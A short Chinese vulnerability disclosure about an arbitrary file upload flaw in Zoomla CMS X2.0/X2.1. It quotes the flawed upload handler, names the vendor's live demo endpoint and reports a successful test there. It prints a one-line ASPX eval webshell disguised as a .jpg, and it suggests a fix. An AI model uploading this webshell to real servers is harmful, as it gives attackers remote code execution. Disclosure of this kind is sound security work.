逐浪cms x2.1 x2.0版本存在文件上传漏洞官网demo测试成功(附poc)

逐浪最新版存在文件上传漏洞
看了下x2.0 同样存在漏洞
x2.0以下的没看 不知道是否同样存在上传漏洞

漏洞页面

http://demo.zoomla.cn//Common/FileService.aspx

漏洞代码
 

protected void Page_Load(object sender, EventArgs e)
{
    string path = "/UploadFiles/UserUpload/";
    HttpFileCollection files = base.Request.Files;
    if (files.Count == 0)
    {
        base.Response.Write("请勿直接访问本文件");
        base.Response.End();
    }
    string str2 = base.Server.MapPath(path);
    HttpPostedFile file = files[0];
    if ((file != null) && (file.ContentLength > 0))
    {
        string filename = str2 + base.Request.Form["fileName"]; //fileName名字可以自己设置 漏洞所在 虽然全局对上传文件名进行白名单判断限制，但是这里的最后的filename文件名可以自己设置 前面判断验证的在好 到这里却形同虚设 
        file.SaveAs(filename);
    }
}

测试：

把一句话木马 文件名改成图片后缀

比如 2.jpg
 

<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

然后利用poc点击上传
 

修复方案：

禁止任意设置文件名